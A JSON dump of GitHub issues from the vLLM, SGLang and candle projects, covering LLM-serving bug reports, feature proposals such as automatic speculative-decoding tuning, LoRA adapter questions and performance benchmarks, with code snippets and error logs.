issue.\n\nThank you very much in advance for your help.\n\nKind regards\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30865", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-17T10:51:34Z", "updated_at": "2025-12-18T08:33:44Z", "comments": 1, "user": "qBrabus" }, { "repo": "sgl-project/sglang", "number": 15321, "title": "[Feature][VLM] Support ViT Piecewise CUDA Graph for VLMs", "body": "### Checklist\n\n- [ ] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\nSupport ViT Piecewise CUDA Graph for VLMs can improve prefill performance for VLMs.\n\n- [x] Support ViT PCG Framework https://github.com/sgl-project/sglang/pull/14422\n- [x] Support Qwen2.5-VL https://github.com/sgl-project/sglang/pull/14422\n- [x] Support Qwen3-VL https://github.com/sgl-project/sglang/pull/15320\n- [ ] Support InternVL\n- [ ] Support GLM-4.1V\n\n### Related resources\n\n_No response_", "url": "https://github.com/sgl-project/sglang/issues/15321", "state": "open", "labels": [ "performance", "Multi-modal", "vlm" ], "created_at": "2025-12-17T09:17:18Z", "updated_at": "2026-01-04T02:09:13Z", "comments": 0, "user": "yuan-luo" }, { "repo": "vllm-project/vllm", "number": 30859, "title": "[Bug]: set_current_vllm_config() is only done during the initialization stage but not the runtime stage", "body": "### Your current environment\n\nAny env\n\n### \ud83d\udc1b Describe the bug\n\n# Issue Statement\n\nCurrently, `set_current_vllm_config()` is only done during the initialization stage but not the runtime stage. If the code tries to call `get_current_vllm_config()`, vLLM prints a warning \"Current vLLM config is not set.\" and returns a default config.\n\nHowever, this approach is problematic because:\n\n1. When contributors change the code, many of us did not realize the fact that `get_current_vllm_config()` should only be called during init stage and should not be called during runtime stage.\n2. It's just a warning instead of a hard failure, so contributors may not notice this when they run local tests.\n3. Such warnings could be annoying to users because it may be printed for every single decoding step. Plus, the warning doesn't carry any useful info about how to fix/bypass the issue.\n4. The default config may be completely incorrect for the caller function.\n5. Warning prints on every step might impact performance, because print isn't fast operation. (thanks to @vadiklyutiy )\n\n# Requirements\n\nWe should change the behavior such that:\n\n- `get_current_vllm_config()` either returns the real config set by the user or raises an error if the config does not exist.\n\n# Related Issues\n\nThis issues have appeared many times in the past. Although the fix is usually not difficult, it is an annoying recurrent issues that we should avoid in the future to avoid wasted engineering effort.\n\n- https://github.com/vllm-project/vllm/issues/13207\n- https://github.com/vllm-project/vllm/pull/29999\n- https://github.com/vllm-project/vllm/issues/30185\n- https://github.com/vllm-project/vllm/issues/30240\n- https://github.com/vllm-project/vllm/issues/30571\n\n\n# Possible Solutions\n\n## Solution A: `set_current_vllm_config()` for runtime stage as well\n\nSuch that `get_current_vllm_config()` is always available, regardless of init stage or runtime stage.\n\n## Solution B: Convert the warning in `get_current_vllm_config()` to a hard failure\n\nBut this means we may need to fix lots of CI failures.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30859", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-17T08:59:49Z", "updated_at": "2025-12-22T18:09:55Z", "comments": 7, "user": "nvpohanh" }, { "repo": "sgl-project/sglang", "number": 15319, "title": "[Feature] RFC: AutoSpec, Automatic Runtime Speculative Inference Parameter Tuning", "body": "### Checklist\n\n- [x] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\n## Summary\n\nThis proposal introduces automatic runtime tuning for speculative inference parameters in SGLang. Instead of requiring users to manually set speculative_num_steps, speculative_topk, and speculative_num_draft_tokens, the system dynamically adjusts them using a feedback-driven controller. This maximizes throughput while respecting hardware limits and draft model capabilities\u2014without any manual configuration. \n\n## Problem & Motivation\n\nCurrently, users of speculative inference in SGLang must manually tune several parameters:\n\n- speculative_num_steps\n- speculative_topk\n- speculative_num_draft_tokens\n\n\"Image\"\n\nFrom the graph, we see that throughput varies with speculative_num_steps and batchsize, and it also suggests that a well-tuned parameter configuration of speculative inference can increase throughput by 5%~50%. These findings suggest three current issues:\n\n1. Trial-and-error overhead \u2013 Finding optimal values per model/hardware/workload is tedious and often results in suboptimal performance.\n\n2. Model capability mismatch \u2013 Different draft models have different effective limits, but static parameters cannot adapt.\n\n3. Batch-size sensitivity \u2013 The optimal number of speculative steps decreases as batch size grows, due to compute constraints.\n\nA single fixed configuration cannot perform well across varying models, hardware, and batch sizes.\n\n## Proposed Design\n\nWe propose a lightweight feedback controller that adjusts speculative_num_steps in real time based on runtime metrics. For simplicity and stability, we keep speculative_topk=1 and speculative_num_draft_tokens=speculative_num_steps+1 (following observed best practices).\n\n### Core Architecture\n\nThe system monitors two metrics after each batch:\n\n- Acceptance rate \u2013 ratio of accepted draft tokens.\n\n- Acceptance length growth \u2013 how much accepted length changes when steps increase.\n\nUsing these, it applies the following simple rules:\n\n1. Increase steps if:\n\n- Acceptance rate is high (configurable, e.g., \u22650.6)\n\n- Acceptance length grows sufficiently (exceeding a model-aware threshold)\n\n- Hardware limits for the current batch size are not exceeded\n\n2. Decrease steps if:\n\n- Acceptance rate is low (e.g., <0.5)\n\n3. Otherwise, keep steps unchanged.\n\nThis forms a stable negative-feedback loop that converges to a near-optimal step count for the current workload.\n\n### Detailed Designs\n\n#### Initialization Phase\n\nDuring system startup, the following initialization sequence occurs:\n\n1. **Computational Threshold Calculation**: For each possible batch size (1, 2, 4, 8, 16, 32, 64), compute the maximum allowable speculative steps given hardware constraints(thres_batchsize);\n2. **Draft Model Ability Analysis**: (Optional) Assess draft model capabilities and establish maximum effective step boundaries. (This step is optional, parameters can be dynamically adjusted and saved during runtime.)\n3. **Theoretical Threshold Establishment**: Calculate lower bound of theoretical accept length growth thresholds for different speculative step values. \n\n#### Runtime Parameter Adjustment Logic\n\nThe adjustment algorithm implements a conservative approach to prevent oscillation:\n\n\"Image\"\n\n```\nFor each batch run:\n 1. Collect metrics: acceptance_rate, acceptance_length_growth_rate\n 2. speculative_num_steps += 1 if (acceptance_length_growth_rate > thres_accept_length_growth_rate AND accept_rate >= thres_positive_accept_rate AND speculative_num_step+1, 'debug_dump_path': None, 'cache_dir': '', 'compile_cache_save_format': 'binary', 'backend': 'inductor', 'custom_ops': ['none'], 'splitting_ops': ['vllm::unified_attention', 'vllm::unified_attention_with_output', 'vllm::unified_mla_attention', 'vllm::unified_mla_attention_with_output', 'vllm::mamba_mixer2', 'vllm::mamba_mixer', 'vllm::short_conv', 'vllm::linear_attention', 'vllm::plamo2_mamba_mixer', 'vllm::gdn_attention_core', 'vllm::kda_attention', 'vllm::sparse_attn_indexer'], 'compile_mm_encoder': False, 'compile_sizes': [], 'inductor_compile_config': {'enable_auto_functionalized_v2': False, 'combo_kernels': True, 'benchmark_combo_kernel': True}, 'inductor_passes': {}, 'cudagraph_mode': , 'cudagraph_num_of_warmups': 1, 'cudagraph_capture_sizes': [1, 2, 4, 8, 16, 24, 32, 40, 48, 56, 64, 72, 80, 88, 96, 104, 112, 120, 128, 136, 144, 152, 160, 168, 176, 184, 192, 200, 208, 216, 224, 232, 240, 248, 256, 272, 288, 304, 320, 336, 352, 368, 384, 400, 416, 432, 448, 464, 480, 496, 512], 'cudagraph_copy_inputs': False, 'cudagraph_specialize_lora': True, 'use_inductor_graph_partition': False, 'pass_config': {'fuse_norm_quant': False, 'fuse_act_quant': False, 'fuse_attn_quant': False, 'eliminate_noops': True, 'enable_sp': False, 'fuse_gemm_comms': False, 'fuse_allreduce_rms': False}, 'max_cudagraph_capture_size': 512, 'dynamic_shapes_config': {'type': }, 'local_cache_dir': None}\n(EngineCore_DP0 pid=732093) /home/smc01/miniconda3/envs/vLLM_12/lib/python3.10/site-packages/torch/cuda/__init__.py:283: UserWarning: \n(EngineCore_DP0 pid=732093) Found GPU0 NVIDIA GB10 which is of cuda capabilit", "url": "https://github.com/vllm-project/vllm/issues/30855", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-17T08:44:11Z", "updated_at": "2025-12-17T08:44:11Z", "comments": 0, "user": "nanbogong" }, { "repo": "vllm-project/vllm", "number": 30847, "title": "[Bug]: Qwen 3VL via Efficient Video Sampling (EVS) to trim video embeddings and found that the number of tokens after timestamp in the Prompt was not aligned with the actual number of tokens after pruning?", "body": "### Your current environment\n\n
\nvllm serve Qwen3-VL-8B --video-pruning-rate=0.75 \n\nmessages=[\n {\n \"role\": \"user\",\n \"content\": [\n # {\"type\": \"text\", \"text\": \"What's in this video?\"},\n {\"type\": \"text\", \"text\": \"\u8fd9\u4e2a\u89c6\u9891\u548c\u56fe\u7247\u5206\u522b\u63cf\u8ff0\u7684\u662f\u4ec0\u4e48\u5185\u5bb9?\"},\n {\n \"type\": \"video_url\",\n \"video_url\": {\n \"url\": \"file:///codes/data/video/Tom_Jerry.mp4\",\n \"fps\": 1,\n },\n }\n ],\n }\n ],\nThe output of python collect_env.py\n\n\n\n\n\n```text\nThe get-video_deplacement_qwen3vl method in the qwen3-vl.py file\nFirstly: Calculate the number of frames per frame\nSecondly, add the specific timestamp of<{cur_time:. 1f} s>to the Prompt and add the calculated number of tokens after the timestamp.\nAt this point, the number of tokens per frame is calculated based on the clipping rate, so except for the first frame, the number of tokens after each frame remains unchanged (EVS is not used to calculate the actual tokens here).\n\nThe EVS algorithm calculates that the number of tokens reserved for each frame is different. It will cause the number of tokens after timestamp to be inconsistent with the actual number of tokens after clipping\n```\n\n
\n\u3001\n\n### \ud83d\udc1b Describe the bug\n\n\n1\u3001get_video_replacement_qwen3vl \nframes_idx_token=[165, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33]\n\n\"Image\"\n2\u3001compute_retention_mask\n\n\"Image\"\n\n\"Image\"\n\n3\u3001embed_input_ids\n\"Image\"\ninput_ids:\n\"Image\"\n\nFrom the above 1 and 3, it can be seen that the data in frames_idx_token is the same as that in embed_input_ids,\nThe first frame contains 165 tokens, while the rest contain 33 tokens\n151656 is the ID of the video token. The number of 151656 is the number of video tokens. The sum of the number of video tokens in all frames is the same as the sum of frames_idx_token.\nRegarding the second item: compute_contention_mask EVS cropped mask, it was found that the number of tokens in the first frame was 165, while the number of tokens in other frames was different,\nBased on the above 1, 2, and 3, it can be concluded that the current implementation of EVS pruning algorithm has problems\nThat is, the number of tokens after timestamp in the Prompt does not match the actual number of tokens that should be retained after EVS pruning.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30847", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-17T06:46:15Z", "updated_at": "2026-01-04T07:39:17Z", "comments": 5, "user": "xshqhua" }, { "repo": "vllm-project/vllm", "number": 30832, "title": "[Performance]: DeepSeek-V3.2 on 8xH20 30 decode tokens/sec", "body": "### Proposal to improve performance\n\n**My Env:**\nvllm 0.13.0rc2.dev178+g676db55ee\ndeep_gemm 2.1.1+c9f8b34\ncuda. 12.9\npython. 3.10.18\n\n**command** is the same as:\nvllm serve mypath/DeepSeek-V3.2 \\\n --tensor-parallel-size 8 \\\n --tokenizer-mode deepseek_v32 \\\n --tool-call-parser deepseek_v32 \\\n --enable-auto-tool-choice \\\n --reasoning-parser deepseek_v3\n\n**My Question:**\nThe output tokens is 30 tokens/s 1/req which is slower than excpted on https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html#benchmarking:\n\nis there any wrong with this?\n\n------------------------------------------------\nBenchmarking[\u00b6](https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html#benchmarking)\nWe used the following script to benchmark deepseek-ai/DeepSeek-V3.2 on 8xH20.\n\n\nvllm bench serve \\\n --model deepseek-ai/DeepSeek-V3.2 \\\n --dataset-name random \\\n --random-input 2048 \\\n --random-output 1024 \\\n --request-rate 10 \\\n --num-prompt 100 \\ \n --trust-remote-code\nTP8 Benchmark Output[\u00b6](https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html#tp8-benchmark-output)\n\n============ Serving Benchmark Result ============\nSuccessful requests: 100 \nFailed requests: 0 \nRequest rate configured (RPS): 10.00 \nBenchmark duration (s): 129.34 \nTotal input tokens: 204800 \nTotal generated tokens: 102400 \nRequest throughput (req/s): 0.77 \nOutput token throughput (tok/s): 791.73 \nPeak output token throughput (tok/s): 1300.00 \nPeak concurrent requests: 100.00 \nTotal Token throughput (tok/s): 2375.18 \n---------------Time to First Token----------------\nMean TTFT (ms): 21147.20 \nMedian TTFT (ms): 21197.97 \nP99 TTFT (ms): 41133.00 \n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 99.71 \nMedian TPOT (ms): 99.25 \nP99 TPOT (ms): 124.28 \n---------------Inter-token Latency----------------\nMean ITL (ms): 99.71 \nMedian ITL (ms): 76.89 \nP99 ITL (ms): 2032.37 \n==================================================\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30832", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-17T03:08:52Z", "updated_at": "2025-12-18T08:01:30Z", "comments": 1, "user": "lisp2025" }, { "repo": "huggingface/candle", "number": 3247, "title": "Parakeet V3 support?", "body": "Any plans to support Parakeet V3 by any chance? Thank you \ud83d\ude4f ", "url": "https://github.com/huggingface/candle/issues/3247", "state": "open", "labels": [], "created_at": "2025-12-16T19:05:33Z", "updated_at": "2025-12-16T19:05:33Z", "comments": 0, "user": "mobicham" }, { "repo": "vllm-project/vllm", "number": 30798, "title": "[Usage]: vllm offline server lora model", "body": "### Your current environment\n\n\n\nHi team,\n\nI have a question about deploying LoRA models with a vLLM offline server.\n\nCurrently, we have a base model **A**. After LoRA training, we obtain adapter parameters **P**. When we serve model A with vLLM (offline server) and enable LoRA, we can select either the **base model A** or **A + P** (LoRA adapter) from the `/v1/models` list for inference.\n\nBased on this, suppose we **merge A and P** into a new merged model **B = A + P**, and then continue LoRA training on top of **B** to obtain another LoRA adapter **Q**.\n\nIs there a way to deploy on a single vLLM server such that the models list allows choosing among these three options for inference?\n\n1. **A**\n2. **A + P**\n3. **A + P + Q**\n\nIf vLLM cannot directly stack LoRA adapters (P then Q) at runtime, is there a recommended approach to **combine P and Q** into a new equivalent adapter (e.g., a single LoRA adapter **R**) that is functionally equivalent to **A + P + Q**, ideally in a way that is **equivalent to training a LoRA adapter directly on base A**?\n\nThanks a lot for your help!\n\n---\n\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30798", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-16T16:38:49Z", "updated_at": "2025-12-18T11:52:39Z", "comments": 4, "user": "zapqqqwe" }, { "repo": "sgl-project/sglang", "number": 15266, "title": "Multi-Adapter Support for Embed Qwen3 8B Embedding Model", "body": "### Checklist\n\n- [x] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\nHi Team, do we currently support multi-adapter (LoRA) support for embedding models, specifically Qwen3 8B Embedding model? If not, when can we expect the support? Thanks :)\n\n### Related resources\n\nI'm training the model for three different tasks using separate lora adapters and need to deploy the model with one base and the three different adapters.\n\nThis is similar to how [Jina v4](https://huggingface.co/jinaai/jina-embeddings-v4) Embedding model has task specific adapters.\n\nMy adapter config looks like this -\n```\n{\n \"alpha_pattern\": {},\n \"auto_mapping\": null,\n \"base_model_name_or_path\": \"/temp/local-ssd/models/Qwen3-Embedding-8B\",\n \"bias\": \"none\",\n \"corda_config\": null,\n \"eva_config\": null,\n \"exclude_modules\": null,\n \"fan_in_fan_out\": false,\n \"inference_mode\": true,\n \"init_lora_weights\": true,\n \"layer_replication\": null,\n \"layers_pattern\": null,\n \"layers_to_transform\": null,\n \"loftq_config\": {},\n \"lora_alpha\": 128,\n \"lora_bias\": false,\n \"lora_dropout\": 0.1,\n \"megatron_config\": null,\n \"megatron_core\": \"megatron.core\",\n \"modules_to_save\": [\n \"classifier\",\n \"score\",\n \"classifier\",\n \"score\"\n ],\n \"peft_type\": \"LORA\",\n \"r\": 32,\n \"rank_pattern\": {},\n \"revision\": null,\n \"target_modules\": [\n \"gate_proj\",\n \"k_proj\",\n \"up_proj\",\n \"q_proj\",\n \"down_proj\",\n \"v_proj\",\n \"o_proj\"\n ],\n \"task_type\": \"SEQ_CLS\",\n \"trainable_token_indices\": null,\n \"use_dora\": false,\n \"use_rslora\": false\n}\n```", "url": "https://github.com/sgl-project/sglang/issues/15266", "state": "open", "labels": [], "created_at": "2025-12-16T14:14:16Z", "updated_at": "2025-12-16T14:14:22Z", "comments": 0, "user": "dawnik17" }, { "repo": "vllm-project/vllm", "number": 30776, "title": "[Usage]: Qwen3-omni's offline usage", "body": "### Your current environment\n\nI used the code below in vllm==0.12.0, but failed.\n```\nimport os\nimport torch\n\nfrom vllm import LLM, SamplingParams\nfrom transformers import Qwen3OmniMoeProcessor\nfrom qwen_omni_utils import process_mm_info\n\ndef build_input(processor, messages, use_audio_in_video):\n text = processor.apply_chat_template(\n messages,\n tokenize=False,\n add_generation_prompt=True,\n )\n # print(text[0])\n # print(len(text[0]))\n audios, images, videos = process_mm_info(messages, use_audio_in_video=use_audio_in_video)\n\n inputs = {\n 'prompt': text,\n 'multi_modal_data': {},\n \"mm_processor_kwargs\": {\n \"use_audio_in_video\": use_audio_in_video,\n },\n }\n\n if images is not None:\n inputs['multi_modal_data']['image'] = images\n if videos is not None:\n inputs['multi_modal_data']['video'] = videos\n if audios is not None:\n inputs['multi_modal_data']['audio'] = audios\n \n return inputs\n\nif __name__ == '__main__':\n # vLLM engine v1 not supported yet\n os.environ['VLLM_USE_V1'] = '1'\n os.environ['CUDA_DEVICES'] = '0,1,2,3,4,5,6,7'\n\n MODEL_PATH = \"Qwen3-Omni-30B-A3B-Instruct\"\n llm = LLM(\n model=MODEL_PATH, trust_remote_code=True, gpu_memory_utilization=0.95,\n tensor_parallel_size=1,\n limit_mm_per_prompt={'image': 3, 'video': 3, 'audio': 3},\n max_num_seqs=8,\n max_model_len=32768,\n seed=17114,\n )\n\n sampling_params = SamplingParams(\n temperature=0.6,\n top_p=0.95,\n top_k=20,\n max_tokens=16384,\n )\n\n processor = Qwen3OmniMoeProcessor.from_pretrained(MODEL_PATH)\n\n conversation1 = [\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"video\",\n \"video\": \"1.mp4\",\n \"fps\": 6,\n }\n ],\n }\n ]\n \n USE_AUDIO_IN_VIDEO = True\n\n # Combine messages for batch processing\n conversations = [conversation1]\n inputs = [build_input(processor, messages, USE_AUDIO_IN_VIDEO) for messages in conversations]\n # print(inputs[0])\n outputs = llm.generate(inputs, sampling_params=sampling_params)\n\n for i in range(len(outputs)):\n print(\"\\n\\n==========\\n\")\n print(outputs[i])\n```\nThe error\n```\nTraceback (most recent call last):\n File \"/sft-qwen3-omni/vllm_inference.py\", line 44, in \n llm = LLM(\n ^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/llm.py\", line 334, in __init__\n self.llm_engine = LLMEngine.from_engine_args(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/llm_engine.py\", line 183, in from_engine_args\n return cls(\n ^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/llm_engine.py\", line 109, in __init__\n self.engine_core = EngineCoreClient.make_client(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core_client.py\", line 93, in make_client\n return SyncMPClient(vllm_config, executor_class, log_stats)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core_client.py\", line 642, in __init__\n super().__init__(\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core_client.py\", line 471, in __init__\n with launch_core_engines(vllm_config, executor_class, log_stats) as (\n File \"/usr/lib/python3.12/contextlib.py\", line 144, in __exit__\n next(self.gen)\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/utils.py\", line 903, in launch_core_engines\n wait_for_engine_startup(\n File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/utils.py\", line 960, in wait_for_engine_startup\n raise RuntimeError(\nRuntimeError: Engine core initialization failed. See root cause above. Failed core proc(s): {'EngineCore_DP0': 1}\n[root:]$ python sft-qwen3-omni/vllm_inference.py\n[2025-12-16 12:25:00] INFO vision_process.py:42: set VIDEO_TOTAL_PIXELS: 90316800\nINFO 12-16 12:25:00 [utils.py:253] non-default args: {'trust_remote_code': True, 'seed': 17114, 'max_model_len': 32768, 'gpu_memory_utilization': 0.95, 'max_num_seqs': 8, 'disable_log_stats': True, 'limit_mm_per_prompt': {'image': 3, 'video': 3, 'audio': 3}, 'model': 'Qwen3-Omni-30B-A3B-Instruct'}\nThe argument `trust_remote_code` is to be used with Auto classes. It has no effect here and is ignored.\nUnrecognized keys in `rope_scaling` for 'rope_type'='default': {'mrope_interleaved', 'interleaved', 'mrope_section'}\nUnrecognized keys in `rope_scaling` for 'rope_type'='default': {'interleaved', 'mrope_section'}\nINFO 12-16 12:25:00 [model.py:637] Resolved architecture: Qwen3OmniMoeForConditionalGeneration\nINFO 12-16 12:25:00 [model.py:1750] Using max model len 32768\nINFO 12-16 12:25:00 [scheduler.py:228] Chun", "url": "https://github.com/vllm-project/vllm/issues/30776", "state": "open", "labels": [ "bug", "usage" ], "created_at": "2025-12-16T12:30:18Z", "updated_at": "2025-12-17T17:03:34Z", "comments": 50, "user": "Auraithm" }, { "repo": "sgl-project/sglang", "number": 15260, "title": "SGLang installs newer PyTorch automatically \u2013 is there an official SGLang \u2194 PyTorch compatibility guide?", "body": "Hi SGLang team, thank you for the great project!\n\nI have a question regarding **PyTorch version compatibility and installation**.\n\nCurrently, the recommended installation command from the website is:\n\n```bash\nuv pip install \"sglang\" --prerelease=allow\n```\n\nHowever, when using this command, `pip/uv` automatically upgrades PyTorch to the latest version (e.g., torch 2.9.1).\nIn my environment, I am intentionally pinned to **torch 2.8.x** and would prefer not to upgrade.\n\nAt the moment, it\u2019s not clear:\n\n* Which **SGLang versions are compatible with which PyTorch versions**\n* Whether older SGLang releases are expected to work with torch 2.8\n* What the recommended installation approach is for users who need to keep a specific torch version\n\n### **Questions**\n\n1. Is there an **official or recommended SGLang \u2194 PyTorch compatibility matrix**?\n2. For users pinned to torch 2.8.x, which SGLang version is recommended?\n3. Is it safe to install SGLang with `--no-deps` or a constraints file to prevent torch upgrades?\n4. Would it be possible to document supported torch versions in the release notes or README?\n\n### **Why this matters**\n\nMany users run SGLang in **production or CUDA-pinned environments**, where upgrading PyTorch is non-trivial. Clear guidance would help avoid dependency conflicts and accidental upgrades.\n\nThanks again for your work \u2014 any guidance would be greatly appreciated!", "url": "https://github.com/sgl-project/sglang/issues/15260", "state": "open", "labels": [], "created_at": "2025-12-16T12:27:59Z", "updated_at": "2025-12-16T12:27:59Z", "comments": 0, "user": "David-19940718" }, { "repo": "vllm-project/vllm", "number": 30757, "title": "[Performance]: Async sched: Why return AsyncGPUModelRunnerOutput util func sample_tokens", "body": "### Proposal to improve performance\n\nWhy is AsyncGPUModelRunnerOutput returned only after sample_tokens, not immediately after execute_model?\nhttps://github.com/vllm-project/vllm/blob/0d0c929f2360cde5bae6817ad0f555641329e79d/vllm/v1/engine/core.py#L420-L422\nIf we defer returning AsyncGPUModelRunnerOutput until after sampling, there's a high chance that the async future completes immediately because `AsyncGPUModelRunnerOutput.get_output` is really light workload. As a result, the batch_queue size may effectively remain at 1, preventing overlap between model forward and scheduling of the next batch.\nhttps://github.com/vllm-project/vllm/blob/0d0c929f2360cde5bae6817ad0f555641329e79d/vllm/v1/engine/core.py#L430-L438\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30757", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-16T08:26:08Z", "updated_at": "2025-12-16T08:26:49Z", "comments": 0, "user": "iwzbi" }, { "repo": "vllm-project/vllm", "number": 30736, "title": "[Bug] DCP/DBO: 'NoneType' error building attention_metadata during DeepSeek-V3.1 deployment dummy run", "body": "### Your current environment\n\n```bash\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.10.0a0+git9166f61\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 | packaged by conda-forge | (main, Oct 22 2025, 22:29:10) [GCC 14.3.0] (64-bit runtime)\nPython platform : Linux-5.15.0-124-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0 : NVIDIA H200\nGPU 1 : NVIDIA H200\nGPU 2 : NVIDIA H200\nGPU 3 : NVIDIA H200\nGPU 4 : NVIDIA H200\nGPU 5 : NVIDIA H200\nGPU 6 : NVIDIA H200\nGPU 7 : NVIDIA H200\n\nNvidia driver version : 570.124.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.1rc4.dev1340+gd08981aba.d20251215 (git sha: d08981aba, date: 20251215)\nvLLM Build Flags:\nCUDA Archs : 9.0\nROCm : Disabled\n```\n\n### \ud83d\udc1b Describe the bug\n\nWhen starting vllm serve with the command below, it fails during the final dummy run step and does not start successfully.\n\nStartup Command:\n\n```bash\nvllm serve deepseek-ai/DeepSeek-V3.1-Terminus \\\n --enable-dbo \\\n --stream-interval 10 \\\n --api-server-count 2 \\\n --max-num-batched-tokens 32768 \\\n --max-num-seqs 256 \\\n --long-prefill-token-threshold 16384 \\\n --scheduling-policy fcfs \\\n --data-parallel-size 2 \\\n --data-parallel-size-local 2 \\\n --tensor-parallel-size 4 \\\n --decode-context-parallel-size 4 \\\n --data-parallel-backend mp \\\n --distributed-executor-backend mp \\\n --enable-expert-parallel \\\n --all2all-backend deepep_low_latency \\\n --max-model-len 131072 \\\n --gpu-memory-utilization 0.8 \\\n --quantization \"fp8\" \\\n --trust-remote-code \\\n --enable-auto-tool-choice \\\n --tool-call-parser \"deepseek_v31\" \\\n --chat-template dpsk-v3.1-tool-parser-vllm.jinja \\\n --host ${HOST} \\\n --port ${PORT} \\\n```\n\nError Output\uff1a\n\n```bash\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] WorkerProc hit an exception.\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] Traceback (most recent call last):\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/executor/multiproc_executor.py\", line 817, in worker_busy_loop\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] output = func(*args, **kwargs)\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] ^^^^^^^^^^^^^^^^^^^^^\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/worker/gpu_worker.py\", line 448, in compile_or_warm_up_model\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] cuda_graph_memory_bytes = self.model_runner.capture_model()\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] 